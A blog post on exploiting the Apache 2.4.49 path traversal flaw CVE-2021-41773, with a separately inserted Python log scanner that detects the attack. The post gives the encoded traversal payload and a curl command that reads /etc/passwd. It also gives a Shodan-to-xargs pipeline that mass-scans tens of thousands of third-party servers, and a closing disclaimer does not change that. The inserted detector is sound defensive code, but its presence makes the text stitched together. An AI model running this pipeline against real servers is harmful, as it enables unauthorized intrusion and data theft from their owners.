Finding and Exploiting Path Traversal in Apache 2.4.49 HTTP Server [CVE-2021-41773]
On October 4th Apache disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, tracked as CVE-2021-41773. At the same time Apache released a patch for it in the new version 2.4.50. The vulnerability allows an attacker to bypass the server's path traversal protection using URL encoding. The bypass looks something like this:
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
It is also possible to achieve RCE (remote code execution) if mod_cgi is enabled. Modern web technology no longer uses it, but older websites built on old technology still rely on this functionality. The exploitation process is simple and can be performed with curl as well. Let's see how we can find websites running this Apache version. We will use our favourite search engine, shodan.io. Using this simple query we can find potentially vulnerable Apache 2.4.49 HTTP servers:
"Apache/2.4.49"
We got 78,219 results. Those servers use Apache 2.4.49, but not all of them are vulnerable, so we need to filter out the vulnerable ones. We can do that using bash; let's combine our script with the exploit. The exploit with curl looked something like this:
curl --silent --path-as-is --insecure "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
This only exploits the server and shows us the contents of /etc/passwd. Let's create a detection script around it.
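As an added defender-side example (not the poc.sh this post refers to, and not code from the original), the following Python checks Apache access logs for the encoded dot-segment pattern shown above: it percent-decodes each request path once, flags requests whose decoded path climbs above the document root, and marks the cgi-bin variant separately. The log lines are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines for this demo (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.68.0"
203.0.113.7 - - [05/Oct/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Oct/2021:12:00:03 +0000] "GET /icons/../icons/apache_pb.png HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Oct/2021:12:00:04 +0000] "POST /cgi-bin/.%2E/.%2E/.%2E/.%2E/bin/sh HTTP/1.1" 200 70 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# A dot segment with at least one percent-encoded dot: the form 2.4.49's normalizer
# failed to treat as "..", whereas a literal ".." is normalized or rejected.
ENCODED_DOTDOT_RE = re.compile(r'(?:^|/)(?:\.%2e|%2e\.|%2e%2e)(?=/|$)', re.IGNORECASE)


def resolve_path(raw_path):
    """Percent-decode once and collapse dot segments. Returns (min_depth, resolved);
    a negative min_depth means the request climbed above the document root."""
    depth = min_depth = 0
    parts = []
    for seg in unquote(raw_path.split("?", 1)[0]).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            min_depth = min(min_depth, depth)
            if parts:
                parts.pop()
        else:
            depth += 1
            parts.append(seg)
    return min_depth, "/" + "/".join(parts)


def scan_log(text):
    """One finding per request that uses an encoded dot segment to escape the root."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        min_depth, resolved = resolve_path(raw)
        if ENCODED_DOTDOT_RE.search(raw) and min_depth < 0:
            findings.append({"ip": m.group("ip"), "method": m.group("method"),
                             "status": m.group("status"), "resolved": resolved,
                             # Traversal through cgi-bin is the mod_cgi code-execution variant.
                             "via_cgi_bin": raw.lower().startswith("/cgi-bin/")})
    return findings
```

Plain `../` segments (the third line) are left alone on purpose, since Apache already handles those; only the encoded forms the 2.4.49 normalizer missed produce a finding.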
Now let's download the results from Shodan. But our script takes only one argument at a time, so how can we feed it multiple inputs?
We can extract the IP addresses from the downloaded result using a regex:
cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt
We stored all the IPs in ip.txt. Now let's scan them for the vulnerability using our bash script and xargs:
cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt
We can use httprobe to detect whether a target uses HTTP or HTTPS.
For bug hunters: you can apply the same process to all the subdomains you have collected.
cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt
[This article was for educational and research purposes only; we do not promote harming others' property without permission.]